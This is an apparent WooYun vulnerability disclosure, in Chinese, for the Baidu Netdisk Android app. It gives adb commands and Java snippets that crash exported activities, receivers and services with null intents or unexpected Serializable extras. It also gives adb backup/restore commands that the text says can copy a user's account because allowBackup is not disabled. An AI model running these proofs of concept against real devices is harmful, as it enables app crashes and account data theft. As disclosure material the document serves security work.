WooYun.org

以下漏洞均无需ROOT
1.多处本地拒绝服务
null intent引起的crash
adb shell am broadcast -n com.baidu.netdisk/com.baidu.netdisk.push.PushMessageReceiver
adb shell am broadcast -n com.baidu.netdisk/com.baidu.cyberplayer.dlna.NetworkChangeReceiver
adb shell am start -n com.baidu.netdisk/com.baidu.sumeru.lightapp.activity.LightAppPlayerActivity
adb shell am broadcast -n com.baidu.netdisk/com.baidu.netdisk.util.battery.BatteryMonitor
adb shell am start -n com.baidu.netdisk/com.baidu.netdisk.cloudp2p.ui.RichMediaActivity
adb shell am broadcast -n com.baidu.netdisk/com.baidu.netdisk.p2pshare.PhoneStateReceiver
adb shell am start -n com.baidu.netdisk/com.baidu.netdisk.pim.smsmms.ui.SmsmmsBackupMain
adb shell am broadcast -n com.baidu.netdisk/com.baidu.netdisk.module.toolbox.AppInfoBroadcatReceiver
getSerializable 异常引起的crash
1.
static class SerializableObject implements Serializable {
static final long serialVersionUID = 42L;
SerializableObject() {
super();
}
}
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.baidu.netdisk", "com.baidu.netdisk.ui.FileManagerFailedListActivity"));
intent.putExtra("test_baiduyun_wooyun", new SerializableObject());
startActivity(intent);
2.
com.baidu.android.pushservice.PushService
command:
static class SerializableObject implements Serializable {
static final long serialVersionUID = 42L;
SerializableObject() {
super();
}
}
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.baidu.netdisk", "com.baidu.android.pushservice.PushService"));
intent.putExtra("test_baiduyun_wooyun", new SerializableObject());
startService(intent);
2.allowbackup漏洞
没有配置allowbackup="false"，可导致用户帐户完全被复制
备份应用数据
adb backup -nosystem -noshared -apk -f com.baidu.netdisk.ab com.baidu.netdisk
恢复数据
adb restore com.baidu.netdisk.ab